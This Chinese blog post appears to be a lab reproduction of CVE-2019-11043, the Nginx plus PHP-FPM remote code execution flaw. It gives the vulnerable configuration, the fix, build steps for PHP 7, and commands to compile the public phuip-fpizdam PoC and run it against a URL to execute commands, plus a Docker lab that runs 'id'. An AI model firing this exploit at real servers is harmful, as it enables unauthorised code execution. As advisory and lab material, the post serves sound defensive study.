ShadowHorse
ShadowHorse

CVE-2019-11043 PHP 远程代码执行漏洞

1. 背景

9 月 26 日,PHP 官方发布漏洞通告,其中指出:使用 Nginx + php-fpm 的服务器,在部分配置下,存在远程代码执行漏洞。并且该配置已被广泛使用,危害较大。

漏洞 PoC 在 10 月 22 日公开,国内安全媒体及时发布了预警。

2. 漏洞描述

Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。

Nginx + php-fpm 的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞。

 location ~ [^/]\.php(/|$) {

    fastcgi_split_path_info ^(.+?\.php)(/.*)$;

    fastcgi_param PATH_INFO       $fastcgi_path_info;

    fastcgi_pass   php:9000;

    ...
}

3. 解决方案

在不影响正常业务的情况下,删除 Nginx 配置文件中的如下配置:

fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO       $fastcgi_path_info;

4. github公开的POC

github: https://github.com/neex/phuip-fpizdam

该POC利用了FastCGI变量_fcgi_data_seg中的优化,该优化仅在PHP7中,所以公开的exploit仅在php7下有效,PHP5环境下需要另外的exploit才能生效。

5. 漏洞复现

1. 配置NGINX+PHP-FPM(php7)

配置环境,搭建nginx + php-fpm,验证工作有效。

  1. 下载php7,解压进入目录

     wget -c http://cn2.php.net/distributions/php-7.2.4.tar.gz
 tar -xzvf php-7.2.4.tar.gz

  2. 安装压缩、ssl等相关依赖包

     yum install -y libxml2*
 yum install -y openssl*
 yum install -y libcurl*
 yum install -y libjpeg*
 yum install -y libpng*
 yum install -y freetype*
 yum install -y libmcrypt*

  3. configure 编译源代码

     ./configure --prefix=/usr/local/php --with-config-file-path=/usr/local/php/etc --with-mysqli --with-pdo-mysql --with-iconv-dir --with-freetype-dir --with-jpeg-dir --with-png-dir --with-zlib --with-libxml-dir --enable-simplexml --enable-xml --disable-rpath --enable-bcmath --enable-soap --enable-zip --with-curl --enable-fpm --with-fpm-user=www --with-fpm-group=www --enable-mbstring --enable-sockets --with-gd --with-openssl --with-mhash --enable-opcache --disable-fileinfo

 make & make install

  4. 配置php-fpm,如果配置多个PHP,可以修改端口9000为9001

     修改php-fpm配置文件:
 $ cd /usr/local/php/etc
 $ cp php-fpm.conf.default php-fpm.conf
 $ vi php-fpm.conf
 去掉 pid = run/php-fpm.pid 前面的分号
 $ cd php-fpm.d
 $ cp www.conf.default www.conf  (修改端口)
 $ vi www.conf
 修改user和group的用户为非root用户

  5. ./php-fpm

2. 配置存在漏洞的PHP解析

nginx.cof中添加如下配置:

location ~ [^/]\.php(/|$) {
        root /opt/apache/www;
        fastcgi_split_path_info ^(.+?\.php)(/.*)$;
        fastcgi_index  index.php;
        fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO  $fastcgi_path_info;
        fastcgi_pass   127.0.0.1:9001;
        include     fastcgi_params;
     }

重启nginx

  1. 安装go,编译POC代码

     go get github.com/neex/phuip-fpizdam(文件下载在go的src目录下)

 go build github.com/neex/phuip-fpizdam(全路径,会在当前目录生成运行文件)

  2. 运行POC

     ./phuip-fpizdam http://website.com/index.php
 ./phuip-fpizdam http://website.com/index.php?a=command

[很不幸,配置环境不知哪的问题,验证失败]

    2019/10/29 01:13:19 Detect() returned error: no qsl candidates found, invulnerable or something wrong

4. docker集成验证环境

原链接:https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043

  1. 下载该docker项目文件

  2. docker-compose up -d 运行docker容器

    CVE-2019-11043 PHP 远程代码执行漏洞_第1张图片
    dockerls.png

  3. 运行程序,显示执行成功 ,利用漏洞回显执行命令"id"


    runpoc.png

    id.png

  4. 及时关闭docker服务
    docker ps
    docker stop id

原文链接:https://github.com/shadow-horse/VulnerabilityAnalysis/tree/master/php/cve-2019-11043

你可能感兴趣的:(CVE-2019-11043 PHP 远程代码执行漏洞)

  • C++实现学生管理系统 lijiatu10086 C++c++
    文章目录实验要求一、实验平台二、代码1.结构体以及相关变量2.相关函数实现过程(1)判断一个学生是否已经存在(2)从文件中读写学生信息(3)增加学生(4)删除学生(5)修改学生(6)查询学生(7)main函数的实现3.整体代码总结实验要求实验要求:将班上同学的信息(编号(001对应第一个,008对应第八个),姓名,性别,年龄,学校,年级,班级,爱好……),使用自己设计的结构体来存储。并在此基础上结
  • Win11将右键菜单改回Win10右键菜单样式(右键菜单默认展开) 前端页面仔 windows开发语言
    1,首先用鼠标右键点击“开始”按钮(或者按Win+X键),点击Windows终端(管理员)2,在终端应用程序里粘贴下面的代码win10右键菜单(展开)regadd"HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32"/f/vetaskkill/f/imexplorer.exe&start
  • VSCode用ssh连接ubuntu虚拟机实现远程访问文件夹 小熊@XiaoXiong linux环境高级编程c语言嵌入式vscodesshubuntu
    1.ubuntu安装ssh服务1.1安装sudoapt-getinstallsshsudoapt-getinstallopenssh-server1.2启动ssh服务sudoservicesshstartsudoservicesshstatus#查看状态##或者用下面方式重启ssh服务##/etc/init.d/sshrestart1.3ssh服务加入开机启动
  • 深度学习 vs 传统机器学习:哪个更适合你的项目? AI大模型应用之禅 深度学习机器学习人工智能ai
    深度学习vs传统机器学习:哪个更适合你的项目?关键词:深度学习、传统机器学习、特征工程、数据量、计算资源、项目选择、算法对比摘要:本文将用"炒菜"和"拼图"等生活案例,从核心原理、适用场景、资源需求等维度对比深度学习与传统机器学习。通过具体代码示例和真实项目场景分析,帮助开发者和企业决策者快速判断:你的项目该选深度学习还是传统机器学习?背景介绍目的和范围随着AI技术普及,"该用深度学习还是传统机器
  • Node.js特训专栏-实战进阶:11. Redis缓存策略与应用场景 爱分享的程序员 Node.js前端网络相关javascriptnode.js前端
    欢迎来到Node.js实战专栏!在这里,每一行代码都是解锁高性能应用的钥匙,让我们一起开启Node.js的奇妙开发之旅!Node.js特训专栏主页专栏内容规划详情Redis缓存策略与应用场景:从理论到实战的高性能解决方案一、Redis基础概述1.1Redis核心特性Redis作为高性能内存数据库,具备以下关键优势:1.1.1内存极速读写读写性能:基于纯内存操作,读写操作在微秒级完成,实测单节点QP
  • Python Web开发之“基于flask的轻量级Web应用” 诚威_lol_中大努力中 夏令营复习python前端flask
    参考文章1:https://cloud.tencent.com/developer/article/2373503参考文章2:基于Flask的自定义网站设计与实现(代码全文+讲解V1.0)_flask框架制作网页-CSDN博客参考文章3:Python+Flask+MysqL设计网页-李明惠-博客园(cnblogs.com)最基本的例子来源-参考文章1:说明:导入Flask类——>app=Flask
  • $.post 上传文件_基于 Laravel + Vue 组件实现文件异步上传 Clever Liu $.post上传文件
    我们在上一篇教程中已经演示了如何通过Request请求实例获取各种文本输入数据,但是还有一种输入数据我们没有涉及到,那就是文件上传。我们可以通过Request请求实例提供的file方法获取用户上传文件,并将其保存到指定目录从而完成文件上传,接下来,我们将从前端到后端实现一个完整的用户上传文件功能,包括视图、路由、控制器部分代码。定义文件上传路由首先我们在routes/web.php中定义上传文件涉
  • 掌握Linux C++轻量级Web服务器开发:TinyWebServer项目实战 老光私享
    本文还有配套的精品资源,点击获取简介:TinyWebServer是一个用C++编写的轻量级Web服务器,专为Linux系统设计。它提供了深入学习Web服务器工作原理和本地开发小型项目的机会。项目涵盖了网络套接字编程、多线程处理、HTTP协议解析等关键系统编程技术,并允许通过源代码分析学习和实践。开发者可以通过扩展TinyWebServer来学习更多关于Web服务器的深入知识和技术。1.Linux下
  • Spring 中 Bean 的生命周期 笑衬人心。 JAVA学习笔记springjava后端
    一、什么是Bean生命周期?Spring中的Bean生命周期是指一个Bean从被容器创建到最终销毁所经历的一系列过程。它体现了SpringIOC容器在管理Bean实例时所执行的各个钩子流程,包括初始化、依赖注入、增强处理、销毁等多个环节。二、Bean生命周期完整流程(逻辑顺序)1.实例化(Constructor)2.属性注入(依赖注入,DI)3.感知阶段(Aware接口)4.初始化前处理(Bean
  • 深刻解析如何解决在pycharm中导入tensorflow的子模块keras时的报错(导入语法正确) lovingf pycharmpythontensorflowkeras
    只是导入时报错,但代码仍可以运行1.导入方式正确,但pycharm将其标红2.通过查看tensorflow的官方文件,猜测可能是python版本不适配python需为python3.6-3.9,而我的为python3.113.配置python3.9的环境(详情可看我的另一篇文章),但依然报错4.经过仔细分析,觉得可能是pycharm与tensorflow的适配问题,pycharm无法寻找到tens
  • 新手向:代码编写工具推荐 nightunderblackcat 基础环境配置notepad++pycharmpythonintellij-ideajavac++c#
    开发者兵器谱:我的高效编码六大神器深度解析在软件开发的世界里,得心应手的工具如同侠客手中的利剑。经过多年的项目锤炼,我精心打磨了一套开发工具链,它们各有所长,助我在不同战场上游刃有余。下面就来深度剖析这六位“数字战友”:一、轻骑兵:Notepad++——闪电编辑与文本处理的王者核心定位:超轻量级文本/代码编辑器,启动如闪电,资源占用极低。看家本领:列编辑模式:Alt+鼠标拖拽或Alt+Shift+
  • 精通C++包括哪些方面 melonbo 百问-C/C++c++
    一、语言核心与标准特性多范式编程掌握过程式、面向对象(OOP)、泛型编程(模板)和函数式编程,能根据场景选择最佳范式。内存管理熟练使用new/delete、智能指针(unique_ptr、shared_ptr),理解RAII原则,避免内存泄漏。现代C++标准应用C++11/14/17/20特性(如移动语义、lambda表达式、协程),提升代码效率。模板与元编程实现函数/类模板,掌握SFINAE、变
  • 我的第一个开源项目:用Python搭建轻量级静态网页服务器—— 零基础也能实现的Web开发初体验
    一、为什么选择静态服务器?极简高效:无需数据库或复杂后端逻辑,适合展示简历、作品集等静态内容学习曲线平缓:是理解HTTP协议和Web服务原理的最佳入门方式资源消耗低:单文件Python脚本即可运行,内存占用小于10MB二、完整开发流程(含代码逐行解析)第一步:创建项目结构PWS/#项目根目录├──static/#静态资源文件夹│├──index.html#主页│├──style.css#样式表│└
  • docker 结合shell使用方法,让你更理解docker的运行顺序 cdg==吃蛋糕 dockerlinux运维
    dockerrun-itd\#不多解释,-itd带交互后台运行--namecdg\#容器名称python\#镜像名称/bin/bash-c\#运行bashshell-c执行后面脚本"touch/1.py;\#在根目录touch一个1.py文件echo-e'importrequests\nr=requests.get(\"http://www.baidu.com\")\nprint(r.text)'
  • 开发百度离线地图Java Web项目与无水印瓦片下载工具 王超逸q
    本文还有配套的精品资源,点击获取简介:本项目采用MyEclipse开发环境构建JavaWeb应用程序,实现百度离线地图功能。通过百度地图API获取地图瓦片,并包含无水印瓦片下载工具,需遵循百度地图的使用条款。项目文件包括源代码、配置文件、资源文件,涉及地图API调用、HTTP协议、JavaWeb应用生命周期、MyEclipse使用、地图瓦片坐标系统理解等技术。项目的成功部署需要熟悉Web服务器如T
  • GO(1):GoLand GOPATH和GOROOT详解 rockywish gogolang
    本文所涉及代码路径:https://gitee.com/rockywish/go/tree/master/gopath一、GOPATH的作用第一方:当前工程,第二方:SDK,除此以外的就是第三方存放SDK以外的第三方类库、可以是下载的第三方类库也可以是自己收藏的可复用代码二、配置路径:window:File->Setting->Go->GOPATHmac:Preferences->Go->GOPA
  • uniapp中检查版本,提示升级app,安卓下载apk,ios跳转应用商店 艾小逗 APPuni-appandroidiosapp升级
    uniapp中检查版本,提示升级app,安卓下载apk,ios跳转应用商店##使用方法:可以在app.vue的onLaunch中调用appUpdate,打开app就会检测onLaunch:function(){appUpdate()},完整代码如下://APP更新import{queryAppVersion}from"@/apis/app";//比较版本号:v1v2返回1,相等返回0functio
  • Golang CGO 跨平台开发:一次编写,多平台运行 Golang编程笔记 Golang开发实战Golang编程笔记golang开发语言后端ai
    GolangCGO跨平台开发:一次编写,多平台运行关键词:Golang、CGO、跨平台开发、交叉编译、多平台兼容摘要:本文将带你探索Golang中CGO(C语言交互工具)的跨平台开发奥秘。通过通俗易懂的比喻和实战案例,你将学会如何用CGO调用C语言代码,结合条件编译和交叉编译技术,实现“一次编写,多平台运行”的目标。无论是系统工具开发、底层驱动对接,还是复用已有C库,本文都将为你提供清晰的技术路径
  • Golang教程——配置环境,再探GoLand 棏郢. Gogolang开发语言后端
    文章目录一、Go是什么?二、环境配置验证配置环境变量三、安装开发者工具GoLand四、HelloGolang一、Go是什么?Go(也称为Golang)是一种开源的编程语言,由Google开发并于2009年首次发布。Go语言旨在提供一种简单、高效、可靠的编程语言,适用于构建可扩展的软件系统。Go语言具有以下特点:简洁易读:Go语言的语法简洁明了,易于阅读和理解。它摒弃了一些复杂的语法和概念,使得代码
  • android弹窗验证密码,Android 应用安装添加密码输入弹窗 weixin_39861823 android弹窗验证密码
    基于RKAndroid6.0-MID代码packages/apps/PackageInstaller/src/com/android/packageinstaller/PackageInstallerActivity.java为防止之后遗忘,记录一下安装apk时会弹出输入弹窗,输入内容正确,才可以点击安装按钮,输入错误安装应用弹窗消失先引用需要用到的类importandroid.widget.Ed
  • Kotlin 协程第一弹:协程的使用,一文讲清楚! idaretobe android应用开发androidkotlin开发语言
    今天聊聊Kotlin的协程。协程是Kotlin中一个重要的特性支持,而Kotlin协程的支持,底层依托于虚拟机的特性。它与线程的关系,依然是1:1对应的。而不是类似Go语言这种,真的存在更小的执行体,是一种轻量级线程。Kotlin的协程,可以理解为一种类似线程池的封装,每个协程执行的背后,都依托于一个线程。而它与线程池相比的优势,在于用更精炼的代码,利用阻塞的思想写出非阻塞式的代码。技术不管底层如
  • 自动化时候的坑:adb install时如何处理可恶的风险管控弹窗或者未知来源应用弹窗! dialogtwb ui自动化多线程adbpython软件测试
    各位在自动化通过adbinstall或者pminstall的时候,有没有遇到过华为或者小米或者一加手机的各种安装弹窗呢,除了手动设置,该如何解决呢?目前自动化主流框架,pythonuiautomator2或者appuim等在执行测试的时候会自动给手机安装atx或者appuim引擎,但是如果不手动的点击允许,那么会导致测试失败,这种情况改如果处理呢?下面提供一种多线程的解决方案,亲测可行1个线程执行
  • LD_TRACE_LOADED_OBJECTS 想和我重名? 小Tipslinux
    LD_TRACE_LOADED_OBJECTSExample:LD_TRACE_LOADED_OBJECTS=1$(可执行程序)#LD_TRACE_LOADED_OBJECTS=1/bin/busyboxlibc.so.0=>/lib//libc.so.0(0xb6f3c000)ld-uClibc.so.1=>/lib/ld-uClibc.so.0(0xb6fc8000)#LD_TRACE_LOA
  • kotlin协程的使用详解
    一、协程是什么协程基于线程,它是轻量级线程。Kotlin协程是一种基于挂起函数(suspendfunctions)和结构化并发(structuredconcurrency)的轻量级并发编程模型,允许开发者以接近同步代码的简洁方式编写异步、非阻塞的逻辑。其核心是通过协作式任务调度(而非抢占式线程切换),在单线程或多线程环境中高效管理并发任务,避免传统线程的资源消耗和复杂性,同时提供直观的错误处理和生
  • JVM——垃圾回收 五月茶 JVMjvm
    在Java开发中,JVM不仅负责运行Java字节码,还通过自动内存管理机制帮助开发者避免手动内存管理的复杂性。1.JVM内存模型JVM的内存模型主要包括以下几个部分:方法区(JDK8之后叫元空间):存储类信息,常量池,静态变量堆:所有线程共享的一块内存区域,存放对象实例栈:线程私有程序计数器:线程私有,记录当前线程执行的字节码行号本地方法栈:为Native方法服务2.Java堆的划分年轻代Surv
  • LeetCode 70:爬楼梯|递归到动态规划全路径解析 kiki_2411 算法设计与分析leetcode动态规划算法
    本篇博客将通过LeetCode第70题“ClimbingStairs”为例,系统讲解从递归暴力解法到记忆化搜索、再到动态规划及空间优化的四种典型思路,适合算法初学者深入掌握递归与DP基础。文章目录LeetCode70|爬楼梯一、题目描述二、思路分析三、方法一:递归(不带记忆)思路C++代码四、方法二:递归+记忆化搜索(Top-DownDP)思路五、方法三:动态规划(Bottom-Up)思路六、方法
  • ADB 安装 APK 及处理安装弹窗的方法 要站在顶端 APP自动化adb
    ADB安装APK及处理安装弹窗的方法总结✅背景说明在自动化测试或CI流程中(如JenkinsPipeline),我们经常需要通过ADB安装APK。但在某些设备上,安装过程会弹出“继续安装”按钮或其他确认界面,导致安装命令阻塞,无法继续执行后续操作。为此,我们需要:避免安装卡住自动点击安装按钮(如果必须)保证脚本兼容性(尤其适配Windows+Jenkins)方法一:使用adbinstall-r--
  • [论文阅读] 人工智能 + 软件工程 | 代码注释不一致问题研究:从数据革新到端到端解决方案 张较瘦_ 前沿技术论文阅读人工智能软件工程
    代码注释不一致问题研究:从数据革新到端到端解决方案原文:CCISOLVER:End-to-EndDetectionandRepairofMethod-LevelCode-CommentInconsistencyarXiv:2506.20558CCISolver:End-to-EndDetectionandRepairofMethod-LevelCode-CommentInconsistencyRe
  • 【MySQL】事务 七七&556 面试学习路线阿里巴巴mysql数据库
    MySQL(六)事务一、事务的特性1.原子性2.一致性3.持久性4.隔离性4.1无隔离4.1.1隔离级别4.1.2执行效果4.2写加锁4.2.1隔离级别4.2.2脏读解决4.2.3执行效果4.3读加锁4.3.1不一致解决4.3.2执行效果4.4读写加锁4.4.1隔离级别4.4.2不可重复读解决4.4.3执行效果4.5串行化4.5.1隔离级别4.5.2幻读解决4.5.3执行效果二、事务的使用1.开启
  • spring 面试题 爆爆凯 spring数据库java
    一、Spring基础概念什么是Spring框架?Spring是一个开源的Java应用程序框架,它提供了一种轻量级的、非侵入式的方式来构建企业级应用。Spring的核心功能包括依赖注入(DependencyInjection,DI)、面向切面编程(Aspect-OrientedProgramming,AOP)、事务管理、数据访问等,旨在简化企业级Java开发,提高开发效率和代码的可维护性。Sprin
  • xml解析 小猪猪08 xml
    1、DOM解析的步奏 准备工作:    1.创建DocumentBuilderFactory的对象    2.创建DocumentBuilder对象    3.通过DocumentBuilder对象的parse(String fileName)方法解析xml文件    4.通过Document的getElem
  • 每个开发人员都需要了解的一个SQL技巧 brotherlamp linuxlinux视频linux教程linux自学linux资料
      对于数据过滤而言CHECK约束已经算是相当不错了。然而它仍存在一些缺陷,比如说它们是应用到表上面的,但有的时候你可能希望指定一条约束,而它只在特定条件下才生效。 使用SQL标准的WITH CHECK OPTION子句就能完成这点,至少Oracle和SQL Server都实现了这个功能。下面是实现方式: CREATE TABLE books (   id &
  • Quartz——CronTrigger触发器 eksliang quartzCronTrigger
    转载请出自出处:http://eksliang.iteye.com/blog/2208295 一.概述 CronTrigger 能够提供比 SimpleTrigger 更有具体实际意义的调度方案,调度规则基于 Cron 表达式,CronTrigger 支持日历相关的重复时间间隔(比如每月第一个周一执行),而不是简单的周期时间间隔。 二.Cron表达式介绍 1)Cron表达式规则表 Quartz
  • Informatica基础 18289753290 InformaticaMonitormanagerworkflowDesigner
    1. 1)PowerCenter Designer:设计开发环境,定义源及目标数据结构;设计转换规则,生成ETL映射。 2)Workflow  Manager:合理地实现复杂的ETL工作流,基于时间,事件的作业调度 3)Workflow  Monitor:监控Workflow和Session运行情况,生成日志和报告 4)Repository  Manager:
  • linux下为程序创建启动和关闭的的sh文件,scrapyd为例 酷的飞上天空 scrapy
    对于一些未提供service管理的程序  每次启动和关闭都要加上全部路径,想到可以做一个简单的启动和关闭控制的文件   下面以scrapy启动server为例,文件名为run.sh:   #端口号,根据此端口号确定PID PORT=6800 #启动命令所在目录 HOME='/home/jmscra/scrapy/' #查询出监听了PORT端口
  • 人--自私与无私 永夜-极光
                今天上毛概课,老师提出一个问题--人是自私的还是无私的,根源是什么?               从客观的角度来看,人有自私的行为,也有无私的
  • Ubuntu安装NS-3 环境脚本 随便小屋 ubuntu
      将附件下载下来之后解压,将解压后的文件ns3environment.sh复制到下载目录下(其实放在哪里都可以,就是为了和我下面的命令相统一)。输入命令:   sudo ./ns3environment.sh >>result   这样系统就自动安装ns3的环境,运行的结果在result文件中,如果提示     com
  • 创业的简单感受 aijuans 创业的简单感受
           2009年11月9日我进入a公司实习,2012年4月26日,我离开a公司,开始自己的创业之旅。      今天是2012年5月30日,我忽然很想谈谈自己创业一个月的感受。 当初离开边锋时,我就对自己说:“自己选择的路,就是跪着也要把他走完”,我也做好了心理准备,准备迎接一次次的困难。我这次走出来,不管成败
  • 如何经营自己的独立人脉 aoyouzi 如何经营自己的独立人脉
    独立人脉不是父母、亲戚的人脉,而是自己主动投入构造的人脉圈。“放长线,钓大鱼”,先行投入才能产生后续产出。   现在几乎做所有的事情都需要人脉。以银行柜员为例,需要拉储户,而其本质就是社会人脉,就是社交!很多人都说,人脉我不行,因为我爸不行、我妈不行、我姨不行、我舅不行……我谁谁谁都不行,怎么能建立人脉?我这里说的人脉,是你的独立人脉。   以一个普通的银行柜员
  • JSP基础 百合不是茶 jsp注释隐式对象
      1,JSP语句的声明 <%! 声明 %>    声明:这个就是提供java代码声明变量、方法等的场所。 表达式 <%= 表达式 %>    这个相当于赋值,可以在页面上显示表达式的结果, 程序代码段/小型指令 <% 程序代码片段 %>   2,JSP的注释   <!-- -->
  • web.xml之session-config、mime-mapping bijian1013 javaweb.xmlservletsession-configmime-mapping
    session-config 1.定义: <session-config> <session-timeout>20</session-timeout> </session-config> 2.作用:用于定义整个WEB站点session的有效期限,单位是分钟。   mime-mapping 1.定义: <mime-m
  • 互联网开放平台(1) Bill_chen 互联网qq新浪微博百度腾讯
    现在各互联网公司都推出了自己的开放平台供用户创造自己的应用,互联网的开放技术欣欣向荣,自己总结如下: 1.淘宝开放平台(TOP) 网址:http://open.taobao.com/ 依赖淘宝强大的电子商务数据,将淘宝内部业务数据作为API开放出去,同时将外部ISV的应用引入进来。 目前TOP的三条主线: TOP访问网站:open.taobao.com ISV后台:my.open.ta
  • 【MongoDB学习笔记九】MongoDB索引 bit1129 mongodb
    索引 可以在任意列上建立索引 索引的构造和使用与传统关系型数据库几乎一样,适用于Oracle的索引优化技巧也适用于Mongodb 使用索引可以加快查询,但同时会降低修改,插入等的性能 内嵌文档照样可以建立使用索引 测试数据     var p1 = { "name":"Jack", "age&q
  • JDBC常用API之外的总结 白糖_ jdbc
    做JAVA的人玩JDBC肯定已经很熟练了,像DriverManager、Connection、ResultSet、Statement这些基本类大家肯定很常用啦,我不赘述那些诸如注册JDBC驱动、创建连接、获取数据集的API了,在这我介绍一些写框架时常用的API,大家共同学习吧。     ResultSetMetaData获取ResultSet对象的元数据信息
  • apache VelocityEngine使用记录 bozch VelocityEngine
    VelocityEngine是一个模板引擎,能够基于模板生成指定的文件代码。   使用方法如下:     VelocityEngine engine = new VelocityEngine();// 定义模板引擎     Properties properties = new Properties();// 模板引擎属
  • 编程之美-快速找出故障机器 bylijinnan 编程之美
    package beautyOfCoding; import java.util.Arrays; public class TheLostID { /*编程之美 假设一个机器仅存储一个标号为ID的记录,假设机器总量在10亿以下且ID是小于10亿的整数,假设每份数据保存两个备份,这样就有两个机器存储了同样的数据。 1.假设在某个时间得到一个数据文件ID的列表,是
  • 关于Java中redirect与forward的区别 chenbowen00 javaservlet
    在Servlet中两种实现: forward方式:request.getRequestDispatcher(“/somePage.jsp”).forward(request, response); redirect方式:response.sendRedirect(“/somePage.jsp”); forward是服务器内部重定向,程序收到请求后重新定向到另一个程序,客户机并不知
  • [信号与系统]人体最关键的两个信号节点 comsci 系统
            如果把人体看做是一个带生物磁场的导体,那么这个导体有两个很重要的节点,第一个在头部,中医的名称叫做 百汇穴, 另外一个节点在腰部,中医的名称叫做 命门         如果要保护自己的脑部磁场不受到外界有害信号的攻击,最简单的
  • oracle 存储过程执行权限 daizj oracle存储过程权限执行者调用者
    在数据库系统中存储过程是必不可少的利器,存储过程是预先编译好的为实现一个复杂功能的一段Sql语句集合。它的优点我就不多说了,说一下我碰到的问题吧。我在项目开发的过程中需要用存储过程来实现一个功能,其中涉及到判断一张表是否已经建立,没有建立就由存储过程来建立这张表。 CREATE OR REPLACE PROCEDURE TestProc  IS    fla
  • 为mysql数据库建立索引 dengkane mysql性能索引
    前些时候,一位颇高级的程序员居然问我什么叫做索引,令我感到十分的惊奇,我想这绝不会是沧海一粟,因为有成千上万的开发者(可能大部分是使用MySQL的)都没有受过有关数据库的正规培训,尽管他们都为客户做过一些开发,但却对如何为数据库建立适当的索引所知较少,因此我起了写一篇相关文章的念头。  最普通的情况,是为出现在where子句的字段建一个索引。为方便讲述,我们先建立一个如下的表。
  • 学习C语言常见误区 如何看懂一个程序 如何掌握一个程序以及几个小题目示例 dcj3sjt126com c算法
    如果看懂一个程序,分三步   1、流程   2、每个语句的功能   3、试数   如何学习一些小算法的程序 尝试自己去编程解决它,大部分人都自己无法解决 如果解决不了就看答案 关键是把答案看懂,这个是要花很大的精力,也是我们学习的重点 看懂之后尝试自己去修改程序,并且知道修改之后程序的不同输出结果的含义 照着答案去敲 调试错误
  • centos6.3安装php5.4报错 dcj3sjt126com centos6
    报错内容如下: Resolving Dependencies --> Running transaction check ---> Package php54w.x86_64 0:5.4.38-1.w6 will be installed --> Processing Dependency: php54w-common(x86-64) = 5.4.38-1.w6 for
  • JSONP请求 flyer0126 jsonp
          使用jsonp不能发起POST请求。 It is not possible to make a JSONP POST request. JSONP works by creating a <script> tag that executes Javascript from a different domain; it is not pos
  • Spring Security(03)——核心类简介 234390216 Authentication
    核心类简介 目录 1.1     Authentication 1.2     SecurityContextHolder 1.3     AuthenticationManager和AuthenticationProvider 1.3.1  &nb
  • 在CentOS上部署JAVA服务 java--hhf javajdkcentosJava服务
        本文将介绍如何在CentOS上运行Java Web服务,其中将包括如何搭建JAVA运行环境、如何开启端口号、如何使得服务在命令执行窗口关闭后依旧运行     第一步:卸载旧Linux自带的JDK ①查看本机JDK版本 java -version    结果如下 java version "1.6.0"
  • oracle、sqlserver、mysql常用函数对比[to_char、to_number、to_date] ldzyz007 oraclemysqlSQL Server
    oracle                                &n
  • 记Protocol Oriented Programming in Swift of WWDC 2015 ningandjin protocolWWDC 2015Swift2.0
    其实最先朋友让我就这个题目写篇文章的时候,我是拒绝的,因为觉得苹果就是在炒冷饭, 把已经流行了数十年的OOP中的“面向接口编程”还拿来讲,看完整个Session之后呢,虽然还是觉得在炒冷饭,但是毕竟还是加了蛋的,有些东西还是值得说说的。 通常谈到面向接口编程,其主要作用是把系统设计和具体实现分离开,让系统的每个部分都可以在不影响别的部分的情况下,改变自身的具体实现。接口的设计就反映了系统
  • 搭建 CentOS 6 服务器(15) - Keepalived、HAProxy、LVS rensanning keepalived
    (一)Keepalived (1)安装 # cd /usr/local/src # wget http://www.keepalived.org/software/keepalived-1.2.15.tar.gz # tar zxvf keepalived-1.2.15.tar.gz # cd keepalived-1.2.15 # ./configure # make &a
  • ORACLE数据库SCN和时间的互相转换 tomcat_oracle oraclesql
    SCN(System Change Number 简称 SCN)是当Oracle数据库更新后,由DBMS自动维护去累积递增的一个数字,可以理解成ORACLE数据库的时间戳,从ORACLE 10G开始,提供了函数可以实现SCN和时间进行相互转换;    用途:在进行数据库的还原和利用数据库的闪回功能时,进行SCN和时间的转换就变的非常必要了;    操作方法:   1、通过dbms_f
  • Spring MVC 方法注解拦截器 xp9802 spring mvc
    应用场景,在方法级别对本次调用进行鉴权,如api接口中有个用户唯一标示accessToken,对于有accessToken的每次请求可以在方法加一个拦截器,获得本次请求的用户,存放到request或者session域。 python中,之前在python flask中可以使用装饰器来对方法进行预处理,进行权限处理 先看一个实例,使用@access_required拦截: ?
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他